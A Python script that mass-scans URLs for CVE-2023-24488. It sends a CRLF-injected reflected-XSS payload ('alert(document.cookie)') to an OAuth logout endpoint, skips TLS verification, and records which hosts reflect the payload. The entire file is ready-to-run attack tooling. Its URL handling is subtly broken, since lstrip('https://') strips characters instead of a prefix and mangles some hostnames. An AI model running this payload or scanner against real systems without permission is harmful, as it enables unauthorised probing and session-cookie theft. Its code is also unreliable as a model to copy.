import argparse
import requests

from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable SSL certificate verification warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Function to check vulnerability
def check_cve(url):
    modified_url = url.strip()
    if not modified_url.startswith("http://") and not modified_url.startswith("https://"):
        modified_url = "https://" + modified_url

    urls = [modified_url, "http://" + modified_url.lstrip("https://")]

    vulnerable_ips = []

    for url in urls:
        modified_url = url + "/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E"

        try:
            response = requests.get(modified_url, verify=False, timeout=10)
            response_body = response.text
            response_code = response.status_code

            if "<script>alert(document.cookie)</script>" in response_body and response_code == 302:
                vulnerable_ips.append((url, modified_url))

        except requests.exceptions.RequestException:
            pass

    return vulnerable_ips

# Parse command-line arguments
parser = argparse.ArgumentParser(description="Check vulnerability to CVE-2023-24488")

print("\033[92mDeveloped By: Piyush Kumawat - https://securitycipher.com\033[0m\n")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Single URL/IP to check vulnerability")
group.add_argument("-f", "--file", help="File containing list of URLs/IPs")
parser.add_argument("-o", "--output", help="Output file to save vulnerable IPs")
args = parser.parse_args()

# Check vulnerability for single URL/IP
if args.url:
    print("Checking:", args.url)
    vulnerable_ips = check_cve(args.url)
    if vulnerable_ips:
        print("Vulnerable to CVE-2023-24488")
        for ip, modified_url in vulnerable_ips:
            print("IP:", ip)
            print("Vulnerable URL:", modified_url)

# Check vulnerability for URLs/IPs from file
if args.file:
    vulnerable_ips = []
    with open(args.file, "r") as file:
        for line in file:
            url = line.strip()
            print("\nChecking:", url)
            ips = check_cve(url)
            if ips:
                print("Vulnerable to CVE-2023-24488")
                for ip, modified_url in ips:
                    print("IP:", ip)
                    print("Vulnerable URL:", modified_url)
                    vulnerable_ips.append(ip)

# Save vulnerable IPs to output file
if args.output and vulnerable_ips:
    with open(args.output, "w") as file:
        for ip in vulnerable_ips:
            # Remove "http://" or "https://" prefix before saving to file
            ip = ip.replace("http://", "").replace("https://", "")
            file.write(ip + "\n")
    print("Vulnerable IPs saved to:", args.output)
